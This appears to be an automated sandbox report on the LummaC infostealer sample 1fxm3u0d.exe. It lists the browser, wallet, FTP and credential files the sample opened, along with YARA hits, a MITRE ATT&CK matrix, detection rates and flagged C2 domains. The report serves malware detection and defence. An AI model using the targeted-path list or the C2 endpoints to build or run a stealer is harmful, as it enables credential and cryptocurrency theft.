Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	12 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	151 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	43 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1fxm3u0d.exe	58%	Virustotal		Browse
1fxm3u0d.exe	68%	ReversingLabs	Win32.Trojan.LummaC
1fxm3u0d.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://lev-tolstoi.com/r	0%	Avira URL Cloud	safe
https://authorisev.site/api	100%	Avira URL Cloud	phishing
https://lev-tolstoi.com/api30Qy	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/U	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apimalISo	0%	Avira URL Cloud	safe
https://faulteyotk.site/api(	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/api	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apidE	0%	Avira URL Cloud	safe
https://servicedny.site/apiP	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/A	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/api0	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apic	0%	Avira URL Cloud	safe
https://lev-tolstoi.com:443/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	104.21.66.86	true	true	unknown
thighpecr.cyou	unknown	unknown	true	unknown
goalyfeastz.site	unknown	unknown	false	high
servicedny.site	unknown	unknown	false	high
contemteny.site	unknown	unknown	false	high
faulteyotk.site	unknown	unknown	false	high
opposezmny.site	unknown	unknown	false	high
seallysl.site	unknown	unknown	false	high
dilemmadu.site	unknown	unknown	false	high
authorisev.site	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
goalyfeastz.site	false		high
https://lev-tolstoi.com/api	true	Avira URL Cloud: safe	unknown
seallysl.site	false		high
dilemmadu.site	false		high
thighpecr.cyou	false		high
contemteny.site	false		high
opposezmny.site	false		high
servicedny.site	false		high
authorisev.site	false		high
faulteyotk.site	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900cs	1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/r	1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/U	1fxm3u0d.exe, 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000336E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://faulteyotk.site/api(	1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://authorisev.site/api	1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://servicedny.site/apiP	1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/w	1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
